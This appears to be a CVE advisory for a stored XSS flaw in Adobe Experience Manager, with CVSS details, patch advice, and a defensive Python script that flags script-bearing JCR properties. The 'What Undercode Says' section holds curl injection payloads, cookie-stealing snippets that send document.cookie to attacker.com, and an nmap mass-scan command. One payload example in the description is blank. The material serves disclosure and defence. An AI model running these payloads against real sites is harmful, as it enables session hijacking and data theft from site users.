Adobe Experience Manager, Stored Cross-Site Scripting (XSS), CVE-2026-47978 (MEDIUM) -DC-Jun2026-342


A stored Cross-Site Scripting (XSS) vulnerability exists in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier due to improper neutralization of user-supplied input during web page generation (CWE-79). The flaw allows a low‑privileged attacker (e.g., an authenticated user with author/contributor roles) to inject malicious JavaScript into vulnerable form fields, such as text inputs, rich‑text editors, or metadata properties. Unlike reflected XSS, this stored variant persists because the payload is saved on the server (e.g., in the JCR repository) and subsequently rendered in the HTML output of any page that includes the tainted field without proper output encoding. When a victim—potentially a higher‑privileged user like an administrator or a regular site visitor—browses to the affected page, the victim’s browser executes the attacker’s script in the security context of the vulnerable domain.
The attack path starts with the attacker identifying a form field in the AEM authoring interface or a public‑facing component (e.g., a comment section, a custom component’s text area, or a page property) where input is not correctly sanitized. The attacker inserts a JavaScript payload, for example: `` or a more sophisticated snippet that steals session cookies (document.cookie), exfiltrates page content, or performs actions on behalf of the user. After submission, the payload is stored in the AEM repository as part of the node’s property.
When any other user requests a page that includes the stored value, AEM’s server‑side rendering (e.g., via JSP or HTL, formerly called Sightly) outputs the unencoded string directly into the DOM. The victim’s browser then parses the HTML and executes the script. This behaviour matches the CVSSv3.1 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, where:
– AV:N – The attack is exploitable remotely over a network.
– AC:L – No special conditions are required; the attacker only needs to find an injectable field.
– PR:L – Low‑privileged (authenticated) attacker account is sufficient.
– UI:R – The victim must view the poisoned page.
– S:C – The attack changes the security scope; the script can access resources beyond the original vulnerable component.
– C:L / I:L – Limited confidentiality and integrity impact.
– A:N – No availability impact.
Because AEM often stores administrative data and serves content with elevated trust, successful exploitation can lead to session hijacking, CSRF bypass, privilege escalation, or unauthorised content modification. The vulnerability is classified as MEDIUM severity with a CVSS base score of 5.4.

DailyCVE Form:

Platform: Adobe Experience Manager
Version: ≤6.5.24, LTS SP1, 2026.04
Vulnerability: Stored Cross-Site Scripting
Severity: MEDIUM (5.4)
Date: June 9, 2026

Prediction: June 9, 2026 (Patch)

What Undercode Says:

# Identify vulnerable form fields (example using curl and jq)
curl -k -X GET "https://aem-host:4502/content/sites/test.html" \
-H "Authorization: Bearer $AEM_TOKEN" \
2>/dev/null | grep -E "input|textarea|field"
# Inject a benign test payload
curl -k -X POST "https://aem-host:4502/bin/receive" \
-H "Authorization: Bearer $AEM_TOKEN" \
-d "fieldName=comment&value=<script>console.log('xss')</script>" \
-w "HTTP %{http_code}\n"
# Verify stored payload (check node property)
curl -k -X GET "https://aem-host:4502/content/sites/test/jcr:content/par/comment.json" \
-H "Authorization: Bearer $AEM_TOKEN" \
-H "Accept: application/json" | jq '."comment"'
# Exploit exfiltration snippet (steal session)
curl -k -X GET "https://aem-host:4502/content/sites/test.html?xss=<script>fetch('https://attacker.com/steal?c='%2Bdocument.cookie)</script>"
// JavaScript payload example (Cookie stealer)
var img = new Image();
img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
# Mass check for unpatched instances (Nmap NSE stub)
nmap -p 4502 --script http-stored-xss.nse --script-args "uri=/content/sites,payload=<script>alert(1)</script>" -iL aem_targets.txt

How to Exploit:

  1. Enumerate accessible AEM form fields (e.g., comments, tags, page properties).
  2. Inject a persistent JavaScript payload into a field that lacks output encoding.
  3. Trigger the stored XSS by browsing to the page containing the tainted field.
  4. The victim’s browser executes the malicious script, exfiltrating sensitive data.

Protection:

  • Upgrade to AEM Cloud Service Release 2026.05, AEM 6.5 Service Pack 25, or AEM 6.5 LTS Service Pack 2.
  • Apply output encoding and context‑aware escaping in all HTL/JSP templates.
  • Deploy a Content Security Policy (CSP) that disallows inline scripts and restricts script sources.
  • Use AEM’s built‑in XSS protection filters (com.adobe.granite.xss) and sanitise input in custom components.
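A defender-side audit aid, added here and not part of the advisory or of Adobe's tooling: it walks a Sling JSON node export of the kind retrieved with the `.json` request above, flags string properties that carry script-like content, and shows what context-aware HTML encoding (the equivalent of HTL's default `html` context) would have rendered for each flagged value. The node structure, component path and property values are constructed sample data.

```python
import html
import json
import re

# Patterns that indicate script-bearing content in a stored property.
# Tune these for your own components; they are an audit heuristic, not a sanitizer.
SUSPECT = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),           # inline event handlers, e.g. onload=
    re.compile(r"javascript\s*:", re.I),           # javascript: URIs in href/src
    re.compile(r"<\s*(iframe|svg|object|embed)\b", re.I),
]

def find_script_bearing_properties(node, path="/content"):
    """Walk a Sling JSON export (the .infinity.json shape: properties and
    child nodes mixed in one object) and return (path, property, value)
    triples for string properties that look like script injection."""
    findings = []
    for key, value in node.items():
        if isinstance(value, dict):
            findings.extend(find_script_bearing_properties(value, f"{path}/{key}"))
        elif isinstance(value, str) and any(p.search(value) for p in SUSPECT):
            findings.append((path, key, value))
    return findings

def encoded_for_html_body(value):
    """What output encoding in an HTML text context should have emitted:
    the markup survives as literal text and never reaches the script parser."""
    return html.escape(value, quote=True)

# Constructed sample export, modelled on the comment component path used above.
SAMPLE_EXPORT = json.loads("""{
  "jcr:primaryType": "cq:Page",
  "jcr:content": {
    "jcr:primaryType": "cq:PageContent",
    "jcr:title": "Test page",
    "par": {
      "comment": {
        "sling:resourceType": "my-site/components/comment",
        "author": "alice",
        "comment": "<script>console.log('xss')</script>",
        "link": "javascript:alert(1)"
      },
      "text": {"text": "<p>Plain rich text with <b>bold</b> only.</p>"}
    }
  }
}""")

if __name__ == "__main__":
    for path, prop, val in find_script_bearing_properties(SAMPLE_EXPORT, "/content/sites/test"):
        print(f"{path}/{prop}: {val!r} -> encoded: {encoded_for_html_body(val)!r}")
```

Run it against a real export by replacing `SAMPLE_EXPORT` with the parsed body of a `.infinity.json` request to the content tree you want to audit; every hit is a property whose rendering path needs to be checked for missing or `unsafe`-context output.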

Impact:

  • Unauthorised session hijacking of any user who views the compromised page.
  • Phishing, data theft, and defacement of AEM‑managed web content.
  • Bypass of CSRF protections, leading to state‑changing operations.
  • Potential privilege escalation if an admin or privileged user is tricked into visiting the malicious page.


Sources:

Reported By: nvd.nist.gov